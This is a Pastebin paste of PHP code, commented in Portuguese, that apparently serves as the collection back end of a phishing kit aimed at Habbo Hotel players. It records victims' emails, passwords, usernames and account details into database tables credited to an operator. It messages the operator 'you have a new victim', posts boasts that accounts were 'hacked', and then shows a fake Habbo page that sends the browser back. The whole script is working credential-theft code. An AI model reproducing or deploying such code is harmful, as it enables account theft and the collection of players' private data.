Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- include 'login/includes/connect_db.php';
- if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else { $ip = $_SERVER['REMOTE_ADDR'];}
- if(num_rows("","","acesso"," WHERE ip='$ip'")>2) {
- echo "Banned";
- header('X-Error-Message: Incorrect username or password', true, 500);
- die;
- } else {
- ########################### MÉTODO ########################
- $metodo = "add";
- ######################### DUMP DO SCRIPT #######################
- $diamantes_scape = htmlspecialchars(addslashes($_REQUEST["diamantes"])); //qtd diamantes
- $compras = htmlspecialchars(addslashes($_REQUEST["compras"])); //hist compras
- $moedas_scape = htmlspecialchars(addslashes($_REQUEST["moedas"])); //qtd moedas
- $emblemac = htmlspecialchars(addslashes($_REQUEST['emblemac'])); //possui emblema hc
- $mobis = htmlspecialchars(addslashes($_REQUEST['mobis'])); //possui emblema mobis
- $verificado = htmlspecialchars(addslashes($_REQUEST['verificado'])); //conta verificada
- $desde = htmlspecialchars(addslashes($_REQUEST['since']));
- $since = substr($desde,0,10); //data de criação
- $email = htmlspecialchars(addslashes($_REQUEST['email'])); //email
- $mail_add = htmlspecialchars(addslashes($_REQUEST['mail_add'])); //email adicionado
- $pass = htmlspecialchars(addslashes($_REQUEST['pass'])); //senha
- $habbo = htmlspecialchars(addslashes($_REQUEST['habbo'])); //nome do habbo
- $user= htmlspecialchars(addslashes(base64_decode($_REQUEST['id']))); //chave do usuário do project
- $origin = htmlspecialchars(addslashes($_REQUEST['origin']));
- $premium = htmlspecialchars(addslashes($_REQUEST['premium']));
- $vip = substr($premium,0,-1); //possui dias de hc
- $origem = substr($origin, 0, 25); //url de execução
- ########################### AÇÕES DO SERVIDOR #########################
- if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $pegar_ip = $_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $pegar_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} else { $pegar_ip = $_SERVER['REMOTE_ADDR'];}//ip
- $dia_visita = $since;//data de criação do habbo
- $dia_acesso = date("d-m-Y");
- $horas_visita = date("H:i:s");//hora que enviou os dados pro project
- $url = htmlspecialchars(addslashes($origem));//url que executou o script
- ########################### VARIÁVEIS DE SERVIDORES DO HABBO ###########################
- $br = ".com.br";
- $it = ".it";
- $es = ".es";
- $fr = ".fr";
- $nl = ".nl";
- $tk = ".com.tr";
- $eua = ".com";
- ########################## VERIFICAR QUAL O SERVIDOR ##########################
- if (strpos($url,$br)){
- $servidor = "http://www.habbo.com.br/"; //SE EXISTIR .com.br NA URL, ENTÃO SERVIDOR VAI SER $BR
- }else if(strpos($url,$it)){
- $servidor = "http://www.habbo.it/";
- }else if(strpos($url,$es)){
- $servidor = "http://www.habbo.es/";
- }else if(strpos($url,$fr)){
- $servidor = "http://www.habbo.fr/";
- }else if(strpos($url,$nl)){
- $servidor = "http://www.habbo.nl/";
- }else if(strpos($url,$tk)){
- $servidor = "http://www.habbo..com.tr/";
- } else if(strpos($url,$eua)){
- $servidor = "http://www.habbo.com/";
- } else {
- $servidor = "Não identificado"; //SE NÃO HOUVER VARIÁVEIS DO HABBO QUE ESTEJAM PRESENTES NA URL, ENTÃO NÃO SERÁ IDENTIFICADO
- }
- ########################## PROTEGENDO CONTRA SQL #############################
- $email_scape = addslashes($email);
- $mail_add_scape = addslashes($mail_add);
- $pass_scape = addslashes($pass);
- $habbo_scape = addslashes($habbo);
- $user_scape = addslashes($user);
- $pegar_ip_scape = addslashes($pegar_ip);
- $dia_visita_scape = addslashes($dia_visita);
- $dia_acesso_scape = addslashes($dia_acesso);
- $horas_visita_scape = addslashes($horas_visita);
- $vip_scape = addslashes($vip);
- /*****************************************************************************************************************/
- //echo num_rows("","","users"," WHERE user = '$user_scape'");
- $resultado = mysqli_query($connect,"SELECT * FROM `users` WHERE `user`='$user_scape'");
- $num_usu = mysqli_num_rows($resultado);
- if($num_usu > 0){
- } else {
- $user_scape = "Frank";
- }
- if(num_rows("","","habbos"," WHERE ip='$pegar_ip_scape'")<10) {
- if(num_rows("","","users"," WHERE user = '$user_scape'") > 0) {
- if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")<1) {
- while($row = mysqli_fetch_array($resultado)) {
- $qtd = $row["qtd"];
- $new_qtd = $qtd + 1;
- mysqli_query($connect,"UPDATE `users` SET `qtd`='$new_qtd' WHERE `user`='$user_scape'");
- }
- mysqli_query($connect,"INSERT INTO notification(user,notification)VALUES('$user_scape','Você tem uma nova vitima!') ");
- mysqli_query($connect,"INSERT INTO habbos(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verify_mail,metodo,moedas,diamantes,deletado,dia_visita,cookies,view,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('0'),('$compras'))");
- mysqli_query($connect,"INSERT INTO habbos_bkp(email,mail_add,pass,habbo,user,data,ip,hora,servidor,vip,emblemac,mobis,verificado,metodo,moedas,diamantes,deletado,dia_visita,cookies,compras)VALUES(('$email_scape'), ('$mail_add_scape'), ('$pass_scape'), ('$habbo_scape'), ('$user_scape'), ('$dia_visita_scape'), ('$pegar_ip_scape'), ('$horas_visita_scape'), ('$servidor'), ('$vip_scape'), ('$emblemac'), ('$mobis'), ('$verificado'), ('$metodo'),('$moedas_scape'),('$diamantes_scape'),(0),('$dia_acesso_scape'),('0'),('$compras'))");
- $data = date("d/m H:i");
- if(mysqli_connect_errno() == 0){
- mysqli_query($connect,"INSERT INTO shoutbox(message)VALUES('<div class=\"message\" style=\"background-color: rgba(33,150,243,0.12);\"><p>Frank<span style=\"font-size:11px;font-weight:normal;color:#676767; float:right;\">$data</span></p><p><span style=\"font-weight:Bold;\">$habbo_scape</span> foi hackeado por <span style=\"font-weight:Bold;\">$user_scape</span> pelo método <span style=\"font-weight:Bold;\">e-mail add</span>!<span style=\"font-size:11px;font-weight:bold;color:#8A1B08; float:right;\">BOT</span></p></div>') ");
- mail("$email_scape","AGRADECIMENTOS XHABBO","Obrigado por utilizar o https://project-xhabbo.com","From: frank@project-xhabbo.com");
- }
- }
- else if(num_rows("","","habbos"," WHERE user='$user_scape' and habbo='$habbo_scape'")>0) {
- mysqli_query($connect,"UPDATE habbos SET mail_add=('$mail_add_scape') WHERE habbo = ('$habbo_scape') AND pass = ('$pass_scape') AND user = ('$user_scape')");//SE JÁ EXISTIR VAMOS APENAS ATUALIZAR O EMAIL ADICIONADO
- mysqli_query($connect,"UPDATE habbos_bkp SET mail_add=('$mail_add_scape') AND dia_visita=('$dia_acesso_scape') AND pass = ('$pass_scape') AND user = ('$user_scape') WHERE habbo = ('$habbo_scape')");//SE JÁ EXISTIR VAMOS APENAS ATUALIZAR O EMAIL ADICIONADO
- }
- }
- } else {
- mysqli_query($connect,"INSERT INTO `acesso` (`ip`) VALUES ('$pegar_ip_scape')");
- }
- }
- ?>
- <!DOCTYPE html>
- <html ng-app="app" lang="fr" debug="true">
- <head>
- <meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
- <title>Habbo Hotel</title>
- <link rel="shortcut icon" href="https://habboo-a.akamaihd.net/habbo-web/america/pt/assets/images/favicon.08c747be.ico">
- <style type="text/css">
- body{
- background:linear-gradient(135deg,#15507c,#0c3a65);
- }
- </style>
- </head>
- <body>
- <script>window.history.back();</script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement